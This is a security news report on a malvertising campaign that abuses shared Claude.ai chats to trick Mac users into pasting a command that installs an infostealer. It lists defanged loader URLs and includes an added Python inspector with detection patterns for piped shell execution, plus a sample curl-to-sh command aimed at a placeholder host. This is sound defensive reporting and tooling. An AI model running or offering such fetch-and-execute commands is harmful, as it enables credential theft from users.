Google Ads and legitimate Claude.ai shared chats are being exploited by attackers in an ongoing malvertising campaign.
People searching for “Claude mac download” may see sponsored search results that display claude.ai as the destination but actually lead to instructions that install malware on their Macs.
[Image: Google’s sponsored search result for ‘claude download mac’ (BleepingComputer)]
Malicious Use of Shared Claude Chats to Target macOS Users
A security engineer at Trendyol Group, Berk Albayrak, discovered the campaign and shared his observations on LinkedIn.
Researcher warns of ongoing malvertising campaign
Albayrak identified a shared Claude.ai chat masquerading as an official “Claude Code on Mac” installation guide, supposedly from “Apple Support.”
The chat instructs users to open Terminal and paste a command, which consequently downloads and executes malware on their Mac systems.
While verifying Albayrak’s discovery, BleepingComputer encountered a second shared Claude chat executing the same attack using separate infrastructure.
Both chats follow a similar pattern and approach but employ different domains and payloads. Both chats were publicly accessible at the time of review.
[Image: Shared Claude chat with malicious instructions (BleepingComputer)]
Functionality of macOS Malware
The base64-encoded command shown in the shared Claude chat fetches an encoded shell script from one of the following URLs:
In the variant observed by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e
In the variant observed by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d
The ‘loader.sh’ (served by the second link above) contains a further set of gzip-compressed shell instructions:
[Image: Base64 code retrieves first-stage ‘loader.sh’ payload (BleepingComputer)]
This compressed shell script is decompressed and executed entirely in memory, leaving minimal traces on disk.
The server was observed delivering a uniquely obfuscated version of the payload upon each request, utilizing polymorphic delivery to evade detection based on known hashes or signatures.
The variant identified by BleepingComputer first checks for Russian or CIS-region keyboard input sources. If one is found, the script sends a discreet cis_blocked status ping to the attacker’s server and exits without doing anything further. Only machines that pass this check proceed to the next stage.
Before advancing, the script gathers the victim’s external IP address, hostname, OS version, and keyboard locale and transmits this data to the attacker. Profiling victims before delivering the payload in this way indicates a targeted operation.
The script proceeds to retrieve a second-stage payload and execute it using osascript, macOS’s built-in scripting engine, granting the attacker remote code execution without deploying a conventional application or binary.
The variant Albayrak identified, by contrast, appears to skip the profiling phase and begins execution immediately.
It harvests browser credentials, cookies, and macOS Keychain contents, compiles them, and transmits them to the attacker’s server. Albayrak recognized this as a variation of the MacSync macOS infostealer:
[Image: Albayrak’s variant skips the user fingerprinting step (BleepingComputer)]
The briskinternet[.]com domain mentioned above in Albayrak’s variant seemed inactive at the time of review.
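The loader chain described in this section (a base64 blob decoded straight into a shell, a remote script piped into a shell, a gzip-compressed stage expanded in memory, and osascript used to run a later stage) is exactly the kind of pasted one-liner a defender can inspect without running it. The following is an added example, not BleepingComputer’s or Albayrak’s code and not the campaign’s script: it peels base64 and gzip layers off a command string and reports which of those indicators appear at which layer. The sample command, the indicator names, and the domain loader.example.invalid are constructed for this example and are not taken from the campaign.

```python
"""Static inspector for pasted terminal one-liners (added example).

Nothing here is executed: the command is treated as text, nested
base64/gzip layers are decoded, and each layer is scanned for the
indicators the loader chain in the article relies on.
"""
import base64
import binascii
import gzip
import re
from dataclasses import dataclass

# Indicator names are this example's own, modelled on the chain described above.
INDICATORS = [
    ("base64-decode-to-shell", re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b")),
    ("remote-script-to-shell", re.compile(r"\b(?:curl|wget)\b[^|;]*https?://[^\s|]+[^|;]*\|\s*(?:ba|z)?sh\b")),
    ("in-memory-gunzip", re.compile(r"\b(?:gunzip|zcat|gzip\s+-d)\b")),
    ("osascript-execution", re.compile(r"\bosascript\b")),
    ("eval-of-dynamic-content", re.compile(r"\beval\b")),
]
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
URL = re.compile(r"https?://[^\s'\"|;)]+")


@dataclass
class Verdict:
    indicators: list   # (indicator name, layer depth) pairs
    urls: list         # defanged URLs found in any layer
    layers: list       # decoded text per layer, outermost first


def _try_decode(token):
    """Return the text hidden in one base64 token, or None if it is not text."""
    try:
        raw = base64.b64decode(token, validate=True)
    except (binascii.Error, ValueError):
        return None
    if raw[:2] == b"\x1f\x8b":              # gzip magic: expand as `gunzip` would
        try:
            raw = gzip.decompress(raw)
        except (OSError, EOFError):
            return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def unwrap_layers(command, max_depth=4):
    """Peel nested base64/gzip layers; layers[0] is the command as pasted."""
    layers = [command]
    for _ in range(max_depth):
        inner = next((t for t in map(_try_decode, B64_TOKEN.findall(layers[-1])) if t), None)
        if inner is None:
            break
        layers.append(inner)
    return layers


def defang(url):
    """Neutralise a URL for reporting: hxxp scheme, bracketed dots in the host only."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + sep + path


def analyze(command):
    """Decode every layer of `command` and collect indicators and URLs per layer."""
    layers = unwrap_layers(command)
    hits, urls = [], []
    for depth, text in enumerate(layers):
        hits += [(name, depth) for name, pat in INDICATORS if pat.search(text)]
        urls += [defang(u) for u in URL.findall(text)]
    return Verdict(hits, urls, layers)


def is_suspicious(command):
    return bool(analyze(command).indicators)


# Constructed sample: a harmless inner stage (placeholder domain, no real payload),
# gzip-compressed and base64-wrapped the way the chain above is described.
INNER_STAGE = (
    "curl -fsSL http://loader.example.invalid/debug/loader.sh | sh\n"
    "osascript -e 'return \"placeholder\"'\n"
)
SAMPLE_COMMAND = (
    "echo "
    + base64.b64encode(gzip.compress(INNER_STAGE.encode("utf-8"))).decode("ascii")
    + " | base64 -d | gunzip | sh"
)

if __name__ == "__main__":
    verdict = analyze(SAMPLE_COMMAND)
    for depth, text in enumerate(verdict.layers):
        print(f"--- layer {depth} ---\n{text.strip()}")
    for name, depth in verdict.indicators:
        print(f"indicator: {name} (layer {depth})")
    for url in verdict.urls:
        print(f"url: {url}")
```

The inspector reports indicators per layer, so a command that looks like a single `echo ... | base64 -d | sh` is unwrapped far enough to show the `curl ... | sh` and `osascript` calls hidden inside it. It will not see anything a remote stage fetches at run time (the ‘loader.sh’ in the campaign is only retrievable from the attacker’s server), which is the same reason the in-memory, polymorphic delivery described above defeats hash-based detection; treating “decode and pipe into a shell” itself as the signal avoids depending on the payload’s content.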
Legitimate URLs as Threat Vectors
Malvertising has emerged as a common channel for malware distribution.
Previous reports by BleepingComputer highlighted comparable campaigns targeting individuals seeking software like GIMP, where a convincing Google ad led to a legitimate-looking domain redirecting visitors to a phishing site.
This campaign, however, differs as it lacks a fake domain. The Google ads direct users to Anthropic’s authentic domain, claude.ai, as the attackers leverage Claude’s shared chat feature for malicious instructions. The link in the ad is genuine.
This method of abusing AI platform shared chats is not unprecedented. BleepingComputer previously covered a similar campaign aimed at ChatGPT and Grok users.
It is advisable for users to visit claude.ai directly to download the official Claude app instead of clicking on sponsored search results. The authentic Claude Code CLI can be obtained through Anthropic’s official documentation without the need to paste commands from a chat interface.
Exercise caution when following instructions that involve pasting terminal commands, irrespective of their apparent source.
Prior to publication, BleepingComputer contacted Anthropic and Google for comments.